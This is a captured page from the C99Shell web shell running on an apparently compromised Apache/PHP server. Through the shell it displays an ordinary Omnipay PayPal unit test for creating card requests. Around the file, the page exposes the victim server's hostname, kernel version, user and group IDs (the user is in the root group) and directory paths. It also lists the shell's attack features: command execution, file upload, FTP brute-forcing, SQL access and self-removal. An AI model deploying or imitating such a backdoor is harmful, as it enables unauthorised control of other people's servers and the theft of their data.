!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/omnipay/paypal/tests/Message/   drwxr-xr-x
Free 28.53 GB of 117.98 GB (24.18%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     RestCreateCardRequestTest.php (1.64 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Omnipay\PayPal\Message;

use 
Omnipay\Common\CreditCard;
use 
Omnipay\Tests\TestCase;

class 
RestCreateCardRequestTest extends TestCase
{
    
/** @var RestCreateCardRequest */
    
protected $request;

    
/** @var CreditCard */
    
protected $card;

    public function 
setUp()
    {
        
parent::setUp();

        
$this->request = new RestCreateCardRequest($this->getHttpClient(), $this->getHttpRequest());

        
$card $this->getValidCard();
        
$this->card = new CreditCard($card);

        
$this->request->initialize(array('card' => $card));
    }

    public function 
testGetData()
    {
        
$card $this->card;
        
$data $this->request->getData();

        
$this->assertSame($card->getNumber(), $data['number']);
        
$this->assertSame($card->getBrand(), $data['type']);
        
$this->assertSame($card->getExpiryMonth(), $data['expire_month']);
        
$this->assertSame($card->getExpiryYear(), $data['expire_year']);
        
$this->assertSame($card->getCvv(), $data['cvv2']);
        
$this->assertSame($card->getFirstName(), $data['first_name']);
        
$this->assertSame($card->getLastName(), $data['last_name']);
        
$this->assertSame($card->getAddress1(), $data['billing_address']['line1']);
        
$this->assertSame($card->getAddress2(), $data['billing_address']['line2']);
        
$this->assertSame($card->getCity(), $data['billing_address']['city']);
        
$this->assertSame($card->getState(), $data['billing_address']['state']);
        
$this->assertSame($card->getPostcode(), $data['billing_address']['postal_code']);
        
$this->assertSame($card->getCountry(), $data['billing_address']['country_code']);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0036 ]--